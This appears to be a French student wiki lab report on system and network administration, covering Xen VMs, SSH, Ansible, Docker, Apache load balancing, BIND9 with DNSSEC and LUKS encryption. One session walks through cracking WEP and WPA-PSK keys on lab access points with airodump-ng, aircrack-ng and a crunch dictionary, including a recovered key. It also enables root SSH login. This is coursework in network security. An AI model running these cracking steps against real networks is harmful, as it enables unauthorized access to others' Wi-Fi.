TP sysres IMA5sc 2019/2020 G6 : Différence entre versions
(→sécurisation du serveur DNS par DNSSEC) |
(→sécurisation du serveur DNS par DNSSEC) |
||
Ligne 354 : | Ligne 354 : | ||
service bind9 restart | service bind9 restart | ||
− | [[Fichier:Sitedns1.png| | + | [[Fichier:Sitedns1.png|250px|left]] |
[[Fichier:Sitedns2.png|300px|center]] | [[Fichier:Sitedns2.png|300px|center]] | ||
Version du 29 janvier 2020 à 17:24
1ère séance
Choix du nom de domaine
Sur le site gandi.net, j'ai acheté le nom de mon domaine qui est: blennoragie.site.
Installation de la machine virtuelle Xen
Via une connection en SSH à cordouan.insecserv.deule.net,on commence par paramétrer le proxy:
export http_proxy=http://proxy.plil.fr:3128 export https_proxy=http://proxy.plil.fr:3128
On installe l'image de la machine virtuelle Xen par la commande suivante:
xen-create-image --hostname=blennoragie --dhcp -- dir=/usr/local/xen
le paramètre hostname spécifie le nom de ma machine(blennorragie) et les disques virtuels sont stockés dans le répertoire(/usr/local/xen). L'adresse IP et le masque de sous réseau de la machine ont été générés automatiquement dans un premier temps mais seront modifiés par la suite.
L'adresse MAC obtenue est : 00:16:3E:D6:E1:DF
2ème séance
Ce TP a pour but de tester les différentes méthodes de sécurisation du réseau WIFI.
Dans un premier temps je vais tenter d'infiltrer le réseau en décryptant le mot de passe de la clef WEP. Ensuite, je vais tester une autre méthode, qui
consiste à craquer le mot de passe WPA-PSK par force brute.
cassage de la clef WEP d'un point d'accès Wifi
Cette partie a été réalisé sur une machine sur laquelle on a branché une clé WIFI. J'ai commencé par installé aircrack-ng, l'outil qui me servira à cracker les différentes clefs.
On commence tout d'abord par repérer le nom de l'interface du réseau sans fil
airmon-ng
On place cet interface en mode monitor. Dans mon cas le nom de l' interface est wlan0.
airmon-ng start wlan0mon
Une fois, l'interface wifi passée en mode monitor, on écoute les trames WIFI qui circulent sur le réseau :
airodump-ng --encrypt wep wlan0mon
On capture les paquets émis par le point d'accès WIFI cracotte06. Pour cela il faut renseigner l'adresse Mac BSSID du client connecté sur cracotte06 (04:DA:D2:9C:50:55) et le numéro du canal qui est 2 dans notre cas. On sauvegarde les paquets capturés dans le fichier craquage.txt
airodump-ng craquag.txt -c 2 --bssid 04:DA:D2:9C:50:55 wlan0mon
Enfin je réalise le cassage de la clef WEP:
aircrack-ng craquage.txt.cap
Pour décrypter la clef il a fallu capturer 30 000 paquets et testé 673 clefs ce qui aura pris 5 minutes.
KEY FOUND! [F1:CA:C4:00:00:00:00:00:00:00:99:99:99] Decrypted correctly:100%
cassage de la clef WAP
On suppose préalablement que le mot de passe de la clef WAP est un nombre à 8 chiffres. On répertorie les trames WIFI qui circulent sur le réseau:
airmon-ng
Je choisi de cibler le réseau kracotte02 dont le BSSID est 04:DA:D2:9C:50:59 et le canal 2. Je le surveille et j'enregistre les paquets qu'il émet dans le fichier psk.
airodump-ng -c 2 --bssid 04:DA:D2:9C:50:59 wlp3s0mon -w psk wlan0mon
. Pour réussir à déchiffrer le mot de passe du réseau, on doit attendre de capturer un Handshake. Ce dernier se produit chaque fois qu'un périphérique se connecte sur le réseau.
Avant de craquer le mot de passe de la clef WPA, on crée d'abord un dictionnaire que je nomme dico.txt contenant tous les mots de passe à 8 chiffres.
crunch 8 8 0123456789 -o dico.txt
Une fois le dictionnaire créer, on peut craquer le mot de passe de la clef WAP:
aircrack-ng psk.cap -w dico.txt
Comme vous pouvez le constater, le décryptage du mot de passe de la clef WAP a pris 51 minutes au cours desquels 20111108 clefs ont été testé sur les 102795810 présents dans le dictionnaire.
3ème séance
Montage des répertoires /var et /home de la VM
On crée les partitions logiques suivantes:
lvcreate -L10G -n blennoragie-home virtual lvcreate -L10G -n blennoragie-var virtual
On fait pointer le système de fichier sur les 2 répertoires précédemment crées:
mkfs -t ext4 /dev/virual/blennoragie-home mkfs -t ext4 /dev/virtual/blennoragie-var
On modifie le fichier de configuration de la VM /etc/xen/blennoragie.cfg dans la section disk pour raccorder les partitions à la machine xen:
disk = [ 'file:/usr/local/xen//domains/blennoragie/disk.img,xvda2,w', 'file:/usr/local/xen//domains/blennoragie/swap.img,xvda1,w',
'phy:/dev/virtual/ima5_blennoragie_home,xvdb1,w', 'phy:/dev/virtual/ima5_blennoragie_var,xvdb2,w', 'phy:/dev/virtual/ima5_blennoragie_disk1,xvdb3,w', 'phy:/dev/virtual/ima5_blennoragie_disk2,xvdb4,w', 'phy:/dev/virtual/ima5_blennoragie_disk3,xvdb5,w'
]
On redémarre la VM :
xl shutdown blennoragie xl create /etc/xen/blennoragie.cfg
Configuration d'accès à internet
On modifie le fichier /etc/network/interfaces pour permettre l'accès à internet de la VM
The primary network interface auto eth0 iface eth0 inet static address 193.48.57.182 netmask 255.255.255.240
Serveur SSH
Pour rendre accessible notre VM par SSH on commence par vérifier si le paquetage openssh est installé via la commande:
ssh -V
La commande m'indique qu'il est déjà installé alors je modifie le fichier de config /etc/ssh/sshd_config ,en editant la commande PermitRootLogin qui permet l'accès direct en root :
PermitRootLogin yes
Il faut redémarrer le service pour qu'il mette à jours les paramètres et ensuite on teste l’état du service :
service ssh restart service ssh status
La configuration s'est bien passé et je peux à présent me connecter en SSH sur ma machine.
Ajout du bridge
On commence par vérifier la configuration du bridge via la commande:
brctl show
On ajoute le bridge au fichier de configuration de la VM blennoragie.cfg. Je remplace le vif existant par le vif suivant:
vif=['mac=00:16:3E:D6:E1:DF, bridge=IMA5sc']
On redémarre la VM et on lance les 2 commandes suivante qui respectivement recharge le fichier de configuration de la VM et démarre la VM:
xl create /etc/xen/blennoragie.cfg xl console blennoragie
4 ème séance
Génération d'un certificat
On commence par saisir la commande suivante dans la machine virtuelle xen :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out myserver.csr
2 fichiers sont générés à la suite de cette commande:
- myserver.key: c'est la clef privée
- myserver.csr: Le fichier qui me servira pour faire ma demande de certificat
Je me rend ensuite sur le site Gandi pour acheter mon certificat et en partageant les informations se trouvant dans le fichier myserver.csr.
Installation d'une machine virtuelle secondaire
Dans cordouan on commence par paramétrer le proxy et ensuite créer une 2ème machine virtuelle Xen privée(private-blennoragie) avec l'adresse ip 192.168.0.6:
export http_proxy=http://proxy.plil.fr:3128 export https_proxy=http://proxy.plil.fr:3128 xen-create-image --hostname=private-blennoragie --dhcp -- dir=/usr/local/xen
On ajoute une 2ème interface eth1 sur la machine virtuelle principale(blennoragie):
The second network interface auto eth1 iface eth1 inet static address 192.168.0.16 netmask 255.255.255.0
Mise en place de la mascarade
On met en place une mascarade sur la machine principale pour permettre à la machine secondaire d'avoir accès à internet.
iptables -P FORWARD DROP iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24 echo 1 > /proc/sys/net/ipv4/conf/all/forwarding
Sur la machine secondaire je fait un ping google.fr pour vérifier si elle est bien connecté et le test est validé.
On installe iptables-persistent et ensuite on se rend dans le fichier /etc/sysctl.conf pour décommenter la ligne: net ipv4:ip-forward=1
propagation de la clef public
On commence par générer une clef asymétrique
ssh-keygen -t rsa
J'installe ma clef public sur ma cible qui prendra comme valeur l'adresse ip e toutes les machines secondaires.
cat .ssh/id_rsa.pub | ssh 192.168.0.1 "cat >> /root/.ssh/authorized_keys2" cat .ssh/id_rsa.pub | ssh 192.168.0.2 "cat >> /root/.ssh/authorized_keys2" cat .ssh/id_rsa.pub | ssh 192.168.0.3 "cat >> /root/.ssh/authorized_keys2" cat .ssh/id_rsa.pub | ssh 192.168.0.4 "cat >> /root/.ssh/authorized_keys2" cat .ssh/id_rsa.pub | ssh 192.168.0.5 "cat >> /root/.ssh/authorized_keys2" cat .ssh/id_rsa.pub | ssh 192.168.0.6 "cat >> /root/.ssh/authorized_keys2"
Ansible
Toujours dans la machine principale, j'installe ansible avec apt-get install ansible. J'edite le fichier /etc/ansible/hosts avec les paramètres suivant:
all: hosts: interne: ansible_host: 192.168.0.6 children: serveur-web: hosts: 192.168.0.1: 192.168.0.2: 192.168.0.3: 192.168.0.4: 192.168.0.5: 192.168.0.6:
pour vérifier la communication avec tout le parc informatique:
ansible all -a "uname -a"
Ansible playbook
Une fois l'inventaire du parc informatique correctement installé, je teste l'execution d'une simple tâche par ansible.Le fichier se trouve dans le repertoire /etc/ansible/jeu.yml
--- - hosts: interne tasks: - name: configuration file copy: src: "motd" dest: "/etc/motd" owner: root group: root mode: '0644'
5ème séance
Création d'un conteneur
Je commence par créer le fichier /test/index.html et le Dockerfile se trouvant dans le répertoire test/docker:
FROM httpd MAINTAINER ReX COPY blennoragie/index.html /usr/local/apache2/htdocs/ EXPOSE 80
le playbook pour balancer le docker se trouve dans test/deploy-site.yaml
hosts: serveur-web tasks: - name: Creating destination folder shell: mkdir -p /tmp/docker/blennoragie
- name: Copying Website files copy: src: "index.html" dest: "/tmp/docker/blennoragie/index.html" owner: root group: root mode: '0777'
- name: Copying Dockerfile copy: src: "docker/Dockerfile" dest: "/tmp/docker/Dockerfile" owner: root group: root mode: '0644'
- name: Install pip apt: name=python-pip state=present
- name: install docker package pip: name=docker
- name: Build Docker image from Dockerfile docker_image: name: blennoragie path: /tmp/docker/ state: build
- name: Running the container docker_container: image: blennoragie:latest state: started recreate: yes name: blennoragiecontainer ports: "8006:80"
- name: Check if container is running shell: docker ps
equilibreur de charge
<virtualHost 193.48.57.182:443> ServerName www.blennoragie.site SSLEngine on SSLCertificateFile /etc/ssl/certs/blennoragie.site.crt SSLCertificateKeyFile /etc/ssl/private/myserver.key SSLCertificateChainfILE /etc/ssl/certs/GandiStandardSSLCA2.pem SSLVerifyclient NONE <Location /balancer-manager> SetHandler balancer-manager </Location> </VirtualHost> <VirtualHost 193.48.57.182:80> ServerName www.blennoragie.site Redirect / https://www.blennoragie.site <Proxy balancer://blenno> BalancerMember http://192.168.0.1:8006/ BalancerMember http://192.168.0.2:8006/ BalancerMember http://192.168.0.3:8006/ BalancerMember http://192.168.0.4:8006/ BalancerMember http://192.168.0.5:8006/ BalancerMember http://192.168.0.6:8006/ ProxySet lbmethod=byrequests </Proxy> ProxyPass / balancer://blenno ProxyPassReverse / balancer://blenno </VirtualHost>
6ème seance
configuration du serveur dns
Ayant déjà acheté mon nom de domaine blennoragie.site sur le site gandi.net,je vais maintenant associer mon domaine à l'adresse IP de ma VM. Pour cela je commence d'abord par installer bind9 et à le configurer.
Installation de bind9
apt-get install bind9 bind9-host dnsutils
Dans /etc/bind/ je crée un fichier db.blennoragie.site où j'ajoute la configuration suivante:
@ IN SOA ns.blennoragie.site. root.blennoragie.site ( 5 ; Serial 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ); Negative Cache TTL IN NS ns.blennoragie.site IN NS ns6.gandi.net. ns IN A 193.48.57.182 www IN A 193.48.57.182 @ IN A 193.48.57.182
J'ajoute ensuite ma zone de DNS dans le fichier etc/bind/named.conf.local:
zone "blennoragie.site" { type master; file "/etc/bind/db.blennoragie.site.signed"; allow-transfer {217.70.177.40;}; };
Je redémarre le bind:
service bind9 restart
Sur le site gandi.net, je me dirige sur mon nom de domaine dans l'onglet glue records et j'ajoute les lignes suivantes:
name : ns.blennoragie.site IP address : 193.48.57.182
sécurisation du serveur DNS par DNSSEC
On va sécuriser le serveur DNS en signant la zone correspondant à mon domaine.Ainsi nous pourrons garantir à l'utilisateur que l'IP qu'il reçoit dans la réponse DNS est bien celle du domaine souhaitée. Pour ce faire nous commençons par ajoutez l’option dnssec-enable yes dans le fichier /etc/bind/named.conf.options. Cet options autorise le protocole DNSSEC par notre serveur DNS. Je crée un répertoire blennoragie.site.dnssec pour y générer les clefs Ensuite, je génère la clef asymétrique de signature de clefs de zone:
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE blennoragie.site
A la suite de cette commande 2 clef KSK, une clef public et une une clef privée. Je génère la clef asymétrique de la zone pour signer les enregistrements
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE blennoragie.site
De même que précedemment une clef private et public zsk sont générées. Je les renomme correctemment mes clefs afin de pouvoir les identifier facilement. Au total j'ai 4 clef
blennoragie.site-ksk.key blennoragie.site-ksk.private blennoragie.site-zsk.key blennoragie.site-zsk.private
J'inclue mes clefs publics dans le fichier zone /etc/bind/db.blennoragie.site
$include /etc/bind/blennoragie.site.dnssec/blennoragie.site-ksk.key $include /etc/bind/blennoragie.site.dnssec/blennoragie.site-zsk.key
Enfin je signe les enregistrements de la zone: dnssec-signzone -o blennoragie.site -k blennoragie.site-ksk ../db.blennoragie.site blennoragie.site-zsk Un fichier nommée db.blennoragie.site.signed est généré Je modifie le fichier named.conf.local pour utiliser la zone signée
zone "blennoragie.site" { type master; file "/etc/bind/db.blennoragie.site.signed"; allow-transfer {217.70.177.40;}; };
Sur le site Gandi.net dans l'onglet DNSSEC de mon domaine,il faut fournir la clef publique ksk généré en sélectionnant le bon algorithme de chiffrement qui est RSA/SHA1 dans notre cas.
Pour terminer on redémarre le bind9
service bind9 restart
7ème séance
cryptage des données
On commence par lister lrs periphériques disponible sur notre machine afin d'identifier le nom de la clef USB :
lsblk
Une fois la clef identifiée on accède aux partitions par la commande :
fdisk /dev/sdb1
On chiffre le périphérique:
cryptsetup luksFormat -c aes -h sha256 /dev/sdb1
Ouverture du périphérique et formatage en ext4 de la partion chiffrée:
cryptsetup luksOpen /dev/sdb1 usb_crypte mkfs.ext4 /dev/mapper/usb_crypte
On monte la partition chiffré sur le point de montage mnt et ensuite on la démonte:
mount -t ext4 /dev/mapper/usb_crypte /mnt/ umount /mnt/
On ferme de manière sécurisée le périphérique
cryptsetup luksClose usb_crypte